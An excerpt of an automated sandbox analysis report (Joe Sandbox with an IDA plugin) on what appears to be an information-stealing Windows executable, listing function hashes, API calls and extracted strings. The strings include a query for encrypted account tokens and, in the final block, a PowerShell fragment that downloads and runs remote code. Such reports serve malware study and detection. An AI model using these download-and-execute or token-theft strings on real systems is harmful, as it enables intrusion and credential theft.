                    • Opcode ID: 355d926354504f605bf63a083571741bbcfc67458f74eb70e54842a85c90e286
                    • Instruction ID: f221cbc75ab16e387751c9b116ef15a62a105912f32ca5c84f33c5bc9026f8a6
                    • Opcode Fuzzy Hash: 355d926354504f605bf63a083571741bbcfc67458f74eb70e54842a85c90e286
                    • Instruction Fuzzy Hash: 72F09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                    APIs
                    • __getptd.LIBCMT ref: 0041C9EA
                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                    • __amsg_exit.LIBCMT ref: 0041CA0A
                    • __lock.LIBCMT ref: 0041CA1A
                    Strings
                    • invalid string position, xrefs: 0041C9E0
                    • cdefghijklmnopqrstuvwxyz, xrefs: 0041C9F1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit$__getptd__getptd_noexit__lock
                    • String ID: cdefghijklmnopqrstuvwxyz$invalid string position
                    • API String ID: 3445076945-1556353147
                    • Opcode ID: e76d0c216dfbc18853365bd0fa83689a94f09e66430c80d3606cd507cbddbdce
                    • Instruction ID: 7f31c5254ef7052323bd295075bc031dd33fd82d1b7aa06430cf1dcd4438de76
                    • Opcode Fuzzy Hash: e76d0c216dfbc18853365bd0fa83689a94f09e66430c80d3606cd507cbddbdce
                    • Instruction Fuzzy Hash: 2C01C431A817299BC722EB669C857DE77A0BF04794F01811BE804A7390C72C69D2CBDD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: /i "$ /passive$"" $.dll$.msi$<
                    • API String ID: 0-1961616256
                    • Opcode ID: 057776c1ec341ebaa2f67c51f371f1357a11d931ce7cfcfbceaad719773efdd2
                    • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                    • Opcode Fuzzy Hash: 057776c1ec341ebaa2f67c51f371f1357a11d931ce7cfcfbceaad719773efdd2
                    • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 0-2791005934
                    • Opcode ID: 8d487e1654f754ba5a0761ee3c5de5ee89a113c5c6ab67c4e72828168a8328fb
                    • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                    • Opcode Fuzzy Hash: 8d487e1654f754ba5a0761ee3c5de5ee89a113c5c6ab67c4e72828168a8328fb
                    • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv
                    • String ID: %d MB$@
                    • API String ID: 3732870572-3474575989
                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                    • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                    • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: "$"$------$------$------
                    • API String ID: 0-2180234286
                    • Opcode ID: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
                    • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                    • Opcode Fuzzy Hash: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
                    • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: "$"$------$------$------
                    • API String ID: 0-2180234286
                    • Opcode ID: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
                    • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                    • Opcode Fuzzy Hash: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
                    • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 0-1526165396
                    • Opcode ID: 27b5e4fc1ccec6ec32ab3a02e27eb1e148215a6b2441a2f08a44eb7b46b35e9a
                    • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                    • Opcode Fuzzy Hash: 27b5e4fc1ccec6ec32ab3a02e27eb1e148215a6b2441a2f08a44eb7b46b35e9a
                    • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv
                    • String ID: @
                    • API String ID: 3732870572-2766056989
                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                    • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                    • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 0-1079375795
                    • Opcode ID: 2304b525dfd5cb075d6fee0e8a0e6a0fb786bc460e7b5f7a938625e5c8a7e397
                    • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                    • Opcode Fuzzy Hash: 2304b525dfd5cb075d6fee0e8a0e6a0fb786bc460e7b5f7a938625e5c8a7e397
                    • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: h@eA$h`eA$jF$0D
                    • API String ID: 0-2392216807
                    • Opcode ID: ab46bafc544b26492acc5b1cf6fcd3781d0311f9c280608e65492746e3f96c47
                    • Instruction ID: 408c48dfe12b650411fad4146a5604383a02d9c5279adaaf68bea769d40d9859
                    • Opcode Fuzzy Hash: ab46bafc544b26492acc5b1cf6fcd3781d0311f9c280608e65492746e3f96c47
                    • Instruction Fuzzy Hash: BF81B975E00204A6DB24F765DC47BED73786B85308F4485AEB449661C1EE3C9B8CCB9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 0-1096346117
                    • Opcode ID: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
                    • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                    • Opcode Fuzzy Hash: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
                    • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                    Strings
                    • ')", xrefs: 00412CB3
                    • <, xrefs: 00412D39
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 0-898575020
                    • Opcode ID: 7f128ac8f9bb9458abef97919d6b2e581af989fbd2c846308f4a6e5cacd24915
                    • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                    • Opcode Fuzzy Hash: 7f128ac8f9bb9458abef97919d6b2e581af989fbd2c846308f4a6e5cacd24915
                    • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9